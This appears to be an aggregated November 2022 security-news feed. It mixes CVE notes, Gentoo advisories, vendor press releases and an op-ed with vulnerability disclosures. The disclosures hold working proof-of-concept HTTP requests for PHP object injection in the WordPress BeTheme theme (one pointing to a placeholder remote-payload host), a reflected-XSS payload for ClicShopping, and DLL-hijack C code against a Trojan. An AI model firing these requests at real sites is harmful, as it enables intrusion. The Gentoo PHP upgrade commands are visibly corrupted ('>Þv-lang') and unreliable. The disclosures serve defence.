Tenda AC15 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetIpMacBind.

CVE-2022-44156

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

CVE-2022-44163

Gentoo Linux Security Advisory 202211-3 - Multiple vulnerabilities have been found in PHP, the worst of which could result in arbitrary code execution. Versions less than 7.4.33:7.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: Normal  
   Title: PHP: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #867913, #873376, #877853  
      ID: 202211-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in PHP, the worst of which  
could result in arbitrary code execution.

Background  
=========  
PHP is a widely-used general-purpose scripting language that is  
especially suited for Web development and can be embedded into HTML.

Affected packages  
================  
-------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-lang/php      < 7.4.33:7.4             >= 7.4.33:7.4  
                                < 8.0.25:8.0             >= 8.0.25:8.0  
                                < 8.1.12:8.1               >= 8.1.12:8.1

Description  
==========  
Multiple vulnerabilities have been discovered in PHP. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All PHP 7.4 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-7.4.33"

All PHP 8.0 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.0.25"

All PHP 8.1 users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">Þv-lang/php-8.1.12"

References  
=========  
[ 1 ] CVE-2022-31628  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31628  
[ 2 ] CVE-2022-31629  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31629  
[ 3 ] CVE-2022-31630  
     https://nvd.nist.gov/vuln/detail/CVE-2022-31630  
[ 4 ] CVE-2022-37454  
     https://nvd.nist.gov/vuln/detail/CVE-2022-37454

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-03

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-03

WordPress BeTheme theme version 26.5.1.4 suffers from multiple PHP object injection vulnerabilities when processing input.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Betheme  
Vendor URL:     https://muffingroup.com/betheme/  
Type:           Deserialization of Untrusted Data [CWE-502]  
Date found:     2022-11-02  
Date published: 2022-11-18  
CVSSv3 Score:   8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE:            CVE-2022-3861

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme 26.5.1.4 and below

4. INTRODUCTION  
===============  
Ever since Betheme was just an idea, we knew that it would be different from all  
other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could  
easily adapt to any project you need to work on without writing any code. A theme  
designed from scratch to save your time & help you enjoy your freedom...

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress theme is vulnerable to multiple PHP Object injections when processing  
input to multiple, privileged Wordpress ajax routes:

-mfn_builder_import -> "mfn-items-import" parameter  
-mfn_builder_import_page -> "mfn-items-import-page" parameter  
-importdata -> "import" parameter  
-importsinglepage -> "import" parameter  
-importfromclipboard -> "import" parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at  
least Wordpress "Contributer" rights.

Successful exploits can allow the attacker to execute arbitrary code.

6. PROOF OF CONCEPT  
===================  
To exploit the "mfn_builder_import" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 75  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "mfn_builder_import_page" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the "importdata" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 114  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the "importsinglepage" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 83  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the "importfromclipboard" ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 123  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: [your-auth-cookies]  
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

7. SOLUTION  
===========  
Update to version 26.6

8. REPORT TIMELINE  
==================  
2022-11-01: Discovery of the vulnerability  
2022-11-03: CVE requested from Wordfence (CNA)  
2022-11-04: Wordfence assigns CVE-2022-3861  
2022-11-08: Vendor notification  
2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond  
2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability  
2022-11-18: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme 26.5.1.4 PHP Object Injection

Gentoo Linux Security Advisory 202211-4 - Multiple vulnerabilities have been found in PostgreSQL, the worst of which could result in remote code execution. Versions greater than or equal to 10.22:10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202211-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                          https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Severity: High  
   Title: PostgreSQL: Multiple Vulnerabilities  
    Date: November 19, 2022  
    Bugs: #793734, #808984, #823125, #865255  
      ID: 202211-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in PostgreSQL, the worst of  
which could result in remote code execution.

Background  
==========

PostgreSQL is an open source object-relational database management  
system.

Affected packages  
=================

-------------------------------------------------------------------  
Package              /     Vulnerable     /            Unaffected  
-------------------------------------------------------------------  
dev-db/postgresql    < 10.22                >= 10.22:10  
                                 < 11.17:11           >= 11.17:11  
                                 < 12.12:12           >= 12.12:12  
                                 < 13.8:13             >= 13.8:13  
                                 < 14.5:14             >= 14.5

Description  
===========

Multiple vulnerabilities have been discovered in PostgreSQL. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All PostgreSQL 10.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-10.22:10"

All PostgreSQL 11.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-11.17:11"

All PostgreSQL 12.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-12.12:12"

All PostgreSQL 13.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-13.8:13"

All PostgreSQL 14.x users should upgrade to the latest version:

 # emerge --sync  
 # emerge --ask --oneshot --verbose ">=dev-db/postgresql-14.5:14"

References  
==========

[ 1 ] CVE-2021-3677  
     https://nvd.nist.gov/vuln/detail/CVE-2021-3677  
[ 2 ] CVE-2021-23214  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23214  
[ 3 ] CVE-2021-23222  
     https://nvd.nist.gov/vuln/detail/CVE-2021-23222  
[ 4 ] CVE-2021-32027  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32027  
[ 5 ] CVE-2021-32028  
     https://nvd.nist.gov/vuln/detail/CVE-2021-32028  
[ 6 ] CVE-2022-1552  
     https://nvd.nist.gov/vuln/detail/CVE-2022-1552  
[ 7 ] CVE-2022-2625  
     https://nvd.nist.gov/vuln/detail/CVE-2022-2625

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

https://security.gentoo.org/glsa/202211-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202211-04

New study identifies critical focus areas for portfolio companies to reduce cyber risks and costs associated with breaches.

**NEW YORK, Nov. 21, 2022 /PRNewswire/** — BlueVoyant, an industry-leading cyber defense company that combines internal and external cybersecurity, today released a new report, highlighting cyber risks impacting private equity portfolio companies. The study found IT management was a top concern, with many portfolio companies struggling with IT hygiene, potentially leaving them susceptible to costly breaches.

"When it comes to private equity portfolio companies, we see a wide range of cyber defense postures," said Dan Vasile, vice president of strategic development at BlueVoyant. "Cybersecurity as a subset of risks is sometimes overlooked. This analysis confirms the need to prioritize cyber defense in order to protect portfolio company value. The private equity space is beginning to get on track. However, we must button up the entire process to protect those vulnerable entities, as well as ramping up cyber defense against less easily exploitable but equally damaging threats."

BlueVoyant analyzed 780 portfolio companies from private equity-backed firms, with the majority headquartered in the U.S., but including companies across Europe and around the globe. Key survey findings include:

*   19% of examined portfolio companies are exposed via "Zero Tolerance Findings" discovered in their internet-facing, publicly accessible footprints. BlueVoyant defines zero tolerance as critical known findings that are easily exploitable by malicious actors and are commonly associated with successful ransomware attacks. Should these vulnerabilities be exploited, it could lead to loss of data and service availability, translating into customer distrust and financial loss.
*   More than 70% of the critical internet-facing findings are related to IT hygiene.

"It is imperative that private equity firms effectively monitor their digital ecosystems by continuously monitoring their portfolio companies to quickly remediate any issues and overcome any cyber attack financial impacts," says James Tamblin, vice chairman, strategic development at BlueVoyant. "Without proper cyber risk management, these companies can face costly repercussions, especially if improvements in IT hygiene are not made."

To maintain cyber vigilance within private equity firms, BlueVoyant recommends proactively working within portfolio companies to reduce cybersecurity risk and avoid the costs associated with breaches. Working with portfolio companies to improve IT management practices to current standards is key, as well as establishing a prioritized risk reduction program, and continually assess for any weaknesses in their real-time risk posture.

BlueVoyant's study used digital "footprints," the mapping of an organization's external-facing network assets, registered IP addresses, and internet hosting presence to gain comprehensive visibility into any given organization's attack surface using a combination of artificial intelligence and machine learning. The full research report, "Private Equity: A Look at Portfolio Company Cyber Risk," is available online here.

**About BlueVoyant**

BlueVoyant combines internal and external cyber defense capabilities into an outcomes-based platform called BlueVoyant Elements™. Elements is cloud-native and continuously monitors your network, endpoints, attack surface, and supply chain plus the clear, deep, and dark web for vulnerabilities, risks, and threats; and takes action to protect your business, leveraging both machine learning-driven automation and human-led expertise. Elements can be deployed as independent solutions or together as a full-spectrum cyber defense platform. BlueVoyant's approach to cyber defense revolves around three key pillars — technology, telemetry, and talent — that deliver industry-leading cybersecurity to more than 700 clients across the globe.

Visit www.bluevoyant.com

SOURCE: BlueVoyant

BlueVoyant Research Reveals Private Equity Portfolio Company Cybersecurity Challenges

ClicShopping version 3.402 suffers from a cross site scripting vulnerability.

    ## Title: ClicShopping_V3-Version3.402 XSS-Reflected## Author: nu11secur1ty## Date: 11.20.2022## Vendor: https://www.clicshopping.org/forum/## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The attacker can trick users to open a very dangerous link or he canget sensitive information, also he can destroy some components of yoursystem.## STATUS: HIGH Vulnerability[+] Payload:```jsGET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)## Proof and Exploit:[href](https://streamable.com/mgbftx)## Time spent`1:00`

ClicShopping 3.402 Cross Site Scripting

Trojan.Win32.Platinum.gen malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/71a76adeadc7b51218d265771fc2b0d1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Win32.Platinum.genVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: PlatinumGroupType: PE32MD5: 71a76adeadc7b51218d265771fc2b0d1Vuln ID: MVID-2022-0657Dropped files: Adobe_Update_Sync.exeDisclosure: 11/18/2022 Exploit/PoC:1) Compile the following C code as "WTSAPI32.dll"2) Place the DLL in same directory as the malware3) Optional - Hide it: attrib +s +h "WTSAPI32.dll"4) Run the malware#include "windows.h"//By malvuln - November 2022//Purpose: PWN Platinum Group malware strain MD5: 71a76adeadc7b51218d265771fc2b0d1//gcc -c WTSAPI32.c -m32//gcc -shared -o WTSAPI32.dll WTSAPI32.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Platinum Group\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.Platinum.gen MVID-2022-0657 Code Execution

Cyber Risk Index report highlights elevated risk as organizations struggle with visibility.

**DALLAS, Nov. 21, 2022 /PRNewswire/** — Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, today announced that 32% of global organizations have had customer records compromised multiple times over the past 12 months as they struggle to profile and defend an expanding attack surface.

The findings come from Trend Micro's semi-annual _Cyber Risk Index_ (CRI) report, compiled by the Ponemon Institute from interviews with over 4,100 organizations across North America, Europe, Latin/South America, and Asia-Pacific.

Customer records are at increased risk as organizations struggle to profile and defend an expanding attack surface.

**Jon Clay, VP of threat intelligence at Trend Micro**: "You can't protect what you can't see. But with hybrid working ushering in a new era of complex, distributed IT environments, many organizations are finding it difficult to eradicate growing security coverage and visibility gaps. To avoid the attack surface spiraling out of control, they need to combine asset discovery and monitoring with threat detection and response on a single platform."

The CRI calculates the gap between organizational preparedness and the likelihood of being attacked, with -10 representing the highest level of risk. The global CRI index moved from –0.04 in 2H 2021 to –0.15 in 1H 2022, indicating a surging level of risk over the past six months.

This trend is also reflected elsewhere in the data: the number of global organizations experiencing a "successful" cyber-attack increased from 84% to 90% over the same period. Unsurprisingly, the number now expected to be compromised over the coming year has also increased from 76% to 85%.

Some of the top preparedness risks highlighted by the index report are related to attack surface discovery capabilities. It is often challenging for security professionals to identify the physical location of business-critical data assets and applications.

From the business perspective, the biggest concern is the misalignment between CISOs and business executives. Based on the scores given by the respondents, "My organization's IT security objectives are aligned with business objectives" only has a score of 4.79 out of 10.

By addressing the shortage of cybersecurity professionals and improving security processes and technology, organizations will significantly reduce their vulnerability to attacks.

Dr. Larry Ponemon, chairman and founder of Ponemon Institute: "The CRI continues to provide a fascinating snapshot of how global organizations perceive their security posture and the likelihood of being attacked. The stakes couldn't be higher in the face of stiff macroeconomic headwinds. Respondents pointed to the high cost of outside expertise, damage to critical infrastructure, and lost productivity as the main negative consequences of a breach."

To read a full copy of the latest _Cyber Risk Index,_ please visit: www.trendmicro.com/cyberrisk

Overall, respondents rated the following as the top cyber threats in 1H 2022:

1.  Business Email Compromise (BEC)
2.  Clickjacking
3.  Fileless attacks
4.  Ransomware
5.  Login attacks (Credential Theft)  
    

**About Trend Micro  
**Trend Micro, a global cybersecurity leader, helps make the world safe for exchanging digital information. Fueled by decades of security expertise, global threat research, and continuous innovation, Trend Micro's cybersecurity platform protects hundreds of thousands of organizations and millions of individuals across clouds, networks, devices, and endpoints. As a leader in cloud and enterprise cybersecurity, the platform delivers a powerful range of advanced threat defense techniques optimized for environments like AWS, Microsoft, and Google, and central visibility for better, faster detection and response. With 7,000 employees across 65 countries, Trend Micro enables organizations to simplify and secure their connected world. www.TrendMicro.com.

SOURCE: Trend Micro Incorporated

A Third of Global Organizations Were Breached Over Seven Times in the Past Year

Threat actors are becoming only more sophisticated and determined.

Current approaches to managing operations and security made sense at the time they were established, pre-cloud and pre-digital transformation. Now, with networked multicloud environments, both digital operations and security are far more complex. And even in the digital world, people and teams want to protect their turf. According to IBM's most recent cyber-resilience report, the top three reasons why cyber resiliency has not improved are:

1.  Inability to reduce silo and turf issues
2.  Fragmented IT and security infrastructure
3.  Lack of visibility into applications and data assets

These are all operational issues.

Operations has been fragmented, with responsibilities scattered across lines of business, including IT, finance, sales and marketing, DevOps, and SecOps. Chief information officers (CIOs) scramble to make sure information is available to those who need it while trying to stay compliant with business and data policies. Meanwhile, chief information security officers (CISOs) focus on protecting assets and data from loss and threats across the entire business. All organizations face a daily flood of data across the multitude of tools and systems they rely on to run their businesses — and yet that data is siloed too.

At the same time, threat actors are increasingly sophisticated and determined. Ransomware is practically a legitimate business — perpetrators have "customer" help desks and arrange payment terms for their victims. Adding tools and people to address security doesn't scale and can no longer solve operational and security issues effectively. The status quo of siloed operations is just not sustainable.

According to IBM's research, the average midsize enterprise runs more than 45 security tools — and that's not to mention those for monitoring applications, the network, and cloud operations. Most are designed for a unique function, which they may do exceedingly well. But together, they can become a management nightmare or be ignored, which is a shame, since their data is valuable. It doesn't make sense to have so many tools yet limit data you ingest — and you also need that data over time to discover potential issues before damage occurs.

**Security and Operations Must Join Forces**

It's time to think differently about approaching both operational integrity _and_ security. Start by considering what ops and security organizations have in common:

1.  **Availability:** Ops is responsible for ensuring business systems and information are available to all who need access. Security teams are responsible for ensuring the right data is available to the right people at the right times on the right devices.
2.  **Risk:** The ops view of risk focuses on keeping everything up and running to avoid downtime and poor performance that kill business productivity and efficiency. Security organizations view risk in terms of data loss, manipulation, and damage to the business.

What if digital operations and security shifted from operating separately — working in silos, managing a lot of tools, duplicating efforts — to working together on a shared data and analytics platform? And what if that platform made them more effective at delivering on their common objectives of providing availability across infrastructure and assets while reducing risk?

Digital ops and security share a common goal of keeping the business operating securely at optimal capacity. To succeed in this shared mission, you need to create a cohesive "digital + security" approach, supported by a team that collaborates and optimizes the resources at hand — both human and machine.

**Security and Operations Need a Common Operational Picture**

For many companies, the cost of running operations takes a disproportionate share of budgets, leaving less to spend on innovation and growth. And it's not helping reduce risk (of downtime or breaches). The only solution is to accelerate digital transformation by shifting focus from worrying about risk to preventing it. And the only way to do that is converging _all_ your operations and security data into a common platform.

Merging ops and security with an information-sharing platform enables fully secured, reliable, and convenient enterprise operations.

By ingesting and analyzing all your operational and security data, you can ultimately derive a common operational picture (COP). From there, you need to connect the dots across ops and security data to gain the context and intelligence necessary to successfully manage risk. Applying advanced analytics and machine learning, organizations can then identify pre-incident situations, rank them by business risk, and correlate them with sufficient context for proactive resolution. 

Ops and security can 100% work together. By doing so, CISOs and CIOs gain insights and can prove damage avoided — which means they can show "goals saved" and quantify value.

Tag

#mac